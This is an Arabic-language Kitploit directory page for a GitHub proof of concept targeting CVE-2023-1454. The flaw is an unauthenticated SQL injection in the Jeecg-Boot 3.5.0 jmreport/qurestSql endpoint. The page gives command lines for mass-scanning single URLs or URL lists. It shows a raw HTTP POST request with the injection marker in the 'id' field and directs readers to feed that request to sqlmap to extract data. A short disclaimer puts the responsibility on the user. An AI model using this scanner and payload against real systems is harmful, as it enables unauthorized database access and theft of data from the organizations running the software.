Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-1454 — jmreport/qurestSql — نموذج إثبات مفهوم (PoC) للمسح الجماعي لثغرات حقن SQL غير المصرّح بها | Kitploit
أدوات/GitHubGitHub/cjybao/cve-2023-1454
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubcjybao/cve-2023-1454

CVE-2023-1454

jmreport/qurestSql — نموذج إثبات مفهوم (PoC) للمسح الجماعي لثغرات حقن SQL غير المصرّح بها

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-1454

jmreport/qurestSql PoC للمسح الجماعي لثغرة حقن SQL غير المصرح بها Jeecg-Boot هي منصة تطوير سريع مبنية على Spring Boot وJeecg-Boot-Plus، وقد تم اكتشاف ثغرات متعددة لحقن SQL في أحدث إصدار jeecg-boot 3.5.0.

استخدام الأداة

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 اختبار عنوان URL واحد

python3 CVE-2023-1454-scan.py -f url.txt فحص جماعي

بعد انتهاء الفحص، سيتم إنشاء ملف vuln.txt في الدليل الحالي يحتوي على عناوين URL المعرضة للثغرة.

poc:

exp:

احفظ حزمة البيانات كملف txt واستخدم sqlmap للحصول على البيانات

root@kitploit:~
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129

{"apiSelectId":"1290104038414721025",
"id":"1*"}

إخلاء المسؤولية

أي عواقب أو خسائر مباشرة أو غير مباشرة تنشأ عن نشر أو استخدام المعلومات الواردة في هذا المستند تقع على عاتق المستخدم نفسه، ولا يتحمل المؤلف أي مسؤولية عن ذلك.

تنزيل الأداة